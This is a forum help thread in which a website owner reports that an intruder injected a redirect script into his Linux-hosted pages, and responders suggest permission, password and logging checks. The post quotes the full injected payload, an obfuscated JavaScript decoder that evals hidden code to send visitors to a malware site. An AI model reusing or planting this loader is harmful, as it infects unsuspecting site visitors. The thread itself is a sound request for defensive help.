Virus on My websites

Someone hacks into my html and php server and he adds this piece of javascript code that it redirects you to a website that downloads virus

<script language=JavaScript>function pbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,24,6,16,62,13,7,17,31,21,0,0,0,0,0,0,40,9,12,1,32,22,5,47,26,38,3,43,28,49,61,57,29,41,19,59,48,11,23,25,51,42,39,0,0,0,0,8,0,14,4,50,53,0,46,45,52,10,18,56,44,30,27,55,54,58,36,37,34,60,33,35,15,2,20);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(253^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}pbn15('ijOrWiQtRS1tLI_taylpOiOr1YgMWiQZ_yAIRIkhi4_sAtWdH6Bsn4_Z3tWoRcAr1yBc_wuXioLoa4@Ze0PsAI1w6UghLIWI3SQrRI_IRI_h82QrmHOhRtWtjZ@hyKgdTcWt9aNwjtkrWE5lLI1sR0_ZRIQr3E5dVSuXb0Bczngp_wBcxKLXHngp8ogtzIWt9yLcaRLo9tAsHEWteKBcPS1tb2AIe0PIzq1w7cAv6xQrRtOoJ6lhzfOwLyAIJK5d')</script><!-- 64.202.163.152 -->

How can i protect my site and how can i track him down ? He has done a lot of damage on our reputation and our clients..

Please help.

cscg1976Asked:
Who is Participating?
 
Daniel McAllisterConnect With a Mentor President, IT4SOHO, LLCCommented:
This question SHOULD have been posted to a Linux zone...

The reason you're getting hacked is that your system is likely vulnerable to breakin from a user account with an easy-to-guess username/password combination (like username dan, password dan; or username dan, password password)

If you're getting hacked, then they're logging in as a USER and that USER is modifying your web site contents. The file is successfully modified because WRITE permission exists on the file.

As a FIRST step, set the permissions to "no-write" for all of your website
From a command prompt, probably with root permissions, execute
chmod ugo-w /var/www/html

If you STILL get hacked, then either your ROOT user password is known (or easy to guess), or the "culprit" is the owner of one of those files/folders.

What I've provided here are just rudimentary steps. It's possible, but unlikely, that you've got vulnerabilities in your apache web server, ssh server, or any of the other services you've got turned on. If you're a novice admin, you're probably also logging in directly as root (a VERY bad idea).

Suffice it to say, if you're NEW to Linux Admin and this is a "professional" server (business website(s), email, etc.), then you may want to look into paying a professional to "lock it down" for you.

Good Luck!

Dan
IT4SOHO
0
 
myhcCommented:
Do you have IIS logging setup on your IIS?
0
 
myhcCommented:
What fire do you have protecting your IIS server, Does that have logging enabled?
0
Worried about phishing attacks?

90% of attacks start with a phish. It’s critical that IT admins and MSSPs have the right security in place to protect their end users from these phishing attacks. Check out our latest feature brief for tips and tricks to keep your employees off a hackers line!

 
cscg1976Author Commented:
It's a Linux box. I don't know what is hapenning.
0
 
myhcCommented:
Please provide Linux details : Model and versions.
Is the firewall part of the box or do you have a hardware firewall?
0
 
lunadlCommented:
Ping your server to see if it was a DNS attack in stead of a data one. Do you know that he gained access to your machine. Ping from proxies to make sure you are hitting from multiple locations.
0
 
cscg1976Author Commented:
How can i ping from proxies?
0
 
Tony McCreathTechnical SEO ConsultantCommented:
I just found this article that also points to access via a user account

http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.